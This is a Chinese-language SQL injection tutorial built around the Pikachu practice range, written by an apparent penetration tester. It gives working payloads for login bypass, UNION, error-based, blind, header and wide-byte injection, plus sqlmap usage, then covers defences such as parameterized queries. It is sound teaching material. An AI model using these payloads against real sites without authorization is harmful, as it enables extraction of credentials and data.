SQL注入攻防实战：从原理到Pikachu靶场通关

1. SQL注入实战：从原理到Pikachu靶场通关

SQL注入是Web安全中最常见也最危险的漏洞之一。作为一名长期从事渗透测试的安全工程师，我经常在各种项目中遇到不同类型的SQL注入漏洞。今天我将通过Pikachu靶场，带大家系统性地掌握SQL注入的各种攻击手法和防御思路。

1.1 SQL注入基础原理

SQL注入的本质是攻击者通过构造特殊的输入，改变原有SQL语句的逻辑结构，从而执行非预期的数据库操作。这种攻击之所以能够成功，根本原因在于应用程序没有对用户输入进行充分的过滤和验证。

在典型的Web应用中，后端代码通常会拼接用户输入的数据到SQL查询语句中。例如：

sql复制SELECT * FROM users WHERE username = '$username' AND password = '$password'

如果攻击者在用户名输入框中输入admin' -- ，那么最终的SQL语句就会变成：

sql复制SELECT * FROM users WHERE username = 'admin' -- ' AND password = '$password'

--是SQL中的注释符号，这样密码检查就被完全绕过了。

1.2 Pikachu靶场环境搭建

Pikachu是一个专门用于Web安全学习的靶场环境，包含了各种常见的Web漏洞场景。要搭建Pikachu靶场，你需要：

1. 安装PHP环境（推荐XAMPP或WAMP）
2. 下载Pikachu源码并解压到Web服务器目录
3. 导入提供的SQL文件初始化数据库
4. 修改config.inc.php中的数据库连接配置

提示：在实际测试中，建议使用虚拟机环境，避免对主机系统造成影响。同时，确保测试环境与互联网隔离，防止意外数据泄露。

2. 数字型注入实战解析

2.1 识别数字型注入点

数字型注入是最基础的注入类型，通常出现在URL参数或表单中直接使用数字ID的场景。在Pikachu靶场中，我们可以通过以下步骤识别数字型注入：

1. 访问数字型注入测试页面
2. 使用Burp Suite拦截请求
3. 观察请求参数，特别是id参数

通过发送id=1 and 1=1和id=1 and 1=2两个测试请求，我们可以确认是否存在注入漏洞。如果第一个请求返回正常结果而第二个请求返回异常，基本可以确定存在数字型注入。

2.2 联合查询注入技术

联合查询(UNION)是SQL注入中最常用的技术之一。它的核心原理是利用UNION操作符将恶意查询结果合并到原始查询结果中。具体步骤如下：

1. 确定查询列数：通过order by递增测试

   sql复制id=1 order by 3--+
   

2. 确定回显位置：使用union select 1,2,3观察哪些数字会显示在页面上

3. 获取数据库信息：

   sql复制id=-1 union select 1,database(),version()--+
   

4. 获取表名：

   sql复制id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
   

5. 获取列名：

   sql复制id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
   

6. 获取数据：

   sql复制id=-1 union select 1,group_concat(username,':',password),3 from users--+
   

注意事项：在实际测试中，group_concat函数有长度限制（默认1024字节），对于大表数据需要使用limit分页获取。

3. 字符型注入与特殊闭合技巧

3.1 字符型注入的特点

字符型注入与数字型注入的主要区别在于参数被单引号、双引号或其他符号包裹。例如：

sql复制SELECT * FROM users WHERE username = '$input'

在这种情况下，我们需要先闭合前面的引号，然后才能注入我们的恶意代码。

3.2 闭合方式判断技巧

判断闭合方式有多种方法：

1. 输入单引号'观察是否报错
2. 输入'1'和'1' and '1'='1比较结果
3. 输入'1' and '1'='2观察是否返回空

在Pikachu靶场的字符型注入测试中，我们发现输入'1会引发语法错误，提示'1''，这表明闭合方式是单引号。

3.3 字符型注入实战

确认闭合方式后，字符型注入的步骤与数字型类似，只是需要在注入代码前后添加适当的闭合符号：

sql复制' union select 1,database(),3--+

对于更复杂的闭合情况，比如id=('$input')，我们需要使用)来闭合：

sql复制') union select 1,database(),3--+

实操心得：在实际渗透测试中，遇到字符型注入时，建议先尝试最常见的单引号闭合，如果失败再尝试其他闭合方式。同时注意URL编码问题，空格通常需要编码为%20，单引号编码为%27。

4. 报错注入技术详解

4.1 报错注入的应用场景

报错注入主要应用于无回显但会显示错误信息的场景。在Pikachu靶场的"insert/update"注入部分，我们就遇到了这种情况。

4.2 常用报错函数

1. updatexml函数：

   sql复制and updatexml(1,concat(0x7e,(select database()),0x7e),1)
   

2. extractvalue函数：

   sql复制and extractvalue(1,concat(0x7e,(select database()),0x7e))
   

3. floor函数：

   sql复制and (select 1 from (select count(*),concat((select database()),floor(rand(0)*2))x from information_schema.tables group by x)a)
   

4.3 报错注入实战

在Pikachu的注册页面，我们发现用户名参数存在注入漏洞。通过构造以下payload获取数据库信息：

sql复制' or extractvalue(1,concat(0x7e,(select database()),0x7e)) or '

这个payload的工作原理是：

1. '闭合前面的单引号
2. or连接我们的注入代码
3. extractvalue函数故意制造XML语法错误
4. concat函数将查询结果与~字符连接
5. 最后的or '闭合后面的单引号

注意事项：报错注入有32字符的长度限制，对于长数据需要使用substr函数分段获取：

sql复制' or extractvalue(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,32),0x7e)) or '

5. 盲注技术深度解析

5.1 布尔盲注技术

布尔盲注适用于没有任何错误信息回显，但页面会根据查询结果返回不同内容的场景。在Pikachu靶场的布尔盲注测试中，我们发现：

1. 输入有效用户名时，页面显示"用户存在"
2. 输入无效用户名时，页面显示"用户不存在"

基于这种行为差异，我们可以构造条件判断来逐字符获取信息：

sql复制' or ascii(substr(database(),1,1))>100 and '1'='1

这个payload会检查当前数据库名的第一个字符的ASCII码是否大于100。通过二分法，我们可以逐步确定每个字符的准确值。

5.2 时间盲注技术

时间盲注是最隐蔽的注入技术，适用于没有任何回显差异的场景。它依赖于条件判断和时间延迟：

sql复制' and if(ascii(substr(database(),1,1))>100,sleep(5),0) and '1'='1

如果第一个字符的ASCII码大于100，数据库会延迟5秒响应，否则立即返回。

实操技巧：为了提高效率，建议使用以下优化方案：

1. 先判断字符范围，再用二分法缩小范围
2. 使用limit限制返回结果数量
3. 对于长数据，先判断长度再逐个字符获取

5.3 使用sqlmap自动化注入

手工盲注非常耗时，在实际测试中我们通常会使用sqlmap等自动化工具：

bash复制sqlmap -u "http://target.com/vul.php?id=1" --technique=B --batch

常用参数说明：

• --technique=B：指定使用布尔盲注
• --technique=T：指定使用时间盲注
• --batch：自动选择默认选项
• --dbs：获取所有数据库名
• -D dbname --tables：获取指定数据库的所有表
• -D dbname -T tablename --dump：导出表数据

6. 特殊注入场景处理

6.1 HTTP头注入

HTTP头注入是指通过修改HTTP请求头字段（如User-Agent、Referer等）进行的注入攻击。在Pikachu靶场中，我们发现User-Agent字段存在注入漏洞。

攻击步骤：

1. 使用正常账号登录

2. 拦截请求，修改User-Agent字段

3. 添加注入代码：

   code复制User-Agent: ' or updatexml(1,concat(0x7e,(select database()),0x7e),1) or '
   

4. 观察返回的错误信息获取数据

安全建议：开发中应避免直接将HTTP头信息拼接到SQL查询中，所有用户可控输入都应进行严格的过滤和转义。

6.2 宽字节注入

宽字节注入是针对使用GBK等双字节编码的数据库的特殊注入技术。它的原理是利用编码特性绕过转义字符。

例如，当PHP配置magic_quotes_gpc=On时，单引号会被转义为\'。但在GBK编码中，%df'会被解析为一个汉字，从而"吃掉"反斜杠：

code复制%df' -> %df%5c%27 -> 運'

这样单引号就成功逃逸，可以用于注入攻击。

防御措施：

1. 使用UTF-8等单字节编码
2. 使用PDO参数化查询
3. 设置正确的字符集连接参数

7. SQL注入防御方案

7.1 参数化查询

参数化查询（预编译语句）是最有效的防御手段。以PHP为例：

php复制$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ? AND password = ?");
$stmt->execute([$username, $password]);

7.2 输入验证与过滤

1. 白名单验证：对于已知有限选项（如性别、状态等），使用白名单验证
2. 类型检查：数字参数确保为数字
3. 长度限制：防止过长的恶意输入

7.3 最小权限原则

数据库用户应遵循最小权限原则：

1. 应用账户只拥有必要的权限
2. 禁止使用root等高权限账户
3. 限制数据库用户的操作权限（SELECT, INSERT等）

7.4 其他防御措施

1. Web应用防火墙(WAF)
2. 定期安全审计
3. 错误信息处理：生产环境关闭详细错误显示
4. 安全编码培训

8. 实战经验与技巧分享

在实际渗透测试中，我发现以下几点特别重要：

1. 耐心和细心：有时候注入点很隐蔽，需要仔细测试每个参数
2. 编码问题：注意URL编码、HTML编码、字符集等问题
3. 工具配合：合理使用Burp Suite、sqlmap等工具提高效率
4. 绕过技巧：熟悉各种WAF绕过方法，如注释分割、大小写混淆、等价函数替换等
5. 日志清理：合法授权测试后，记得清理测试产生的垃圾数据

对于刚入门的同学，我建议：

1. 先在靶场环境充分练习
2. 理解原理而不仅仅是记住payload
3. 从简单注入开始，逐步挑战更复杂的场景
4. 关注安全社区的最新研究和技术发展

SQL注入虽然是一个"古老"的漏洞，但在今天的Web应用中仍然广泛存在。作为安全从业者，我们既要掌握攻击技术以进行有效防御，更要时刻牢记职业道德，只在合法授权的范围内进行测试。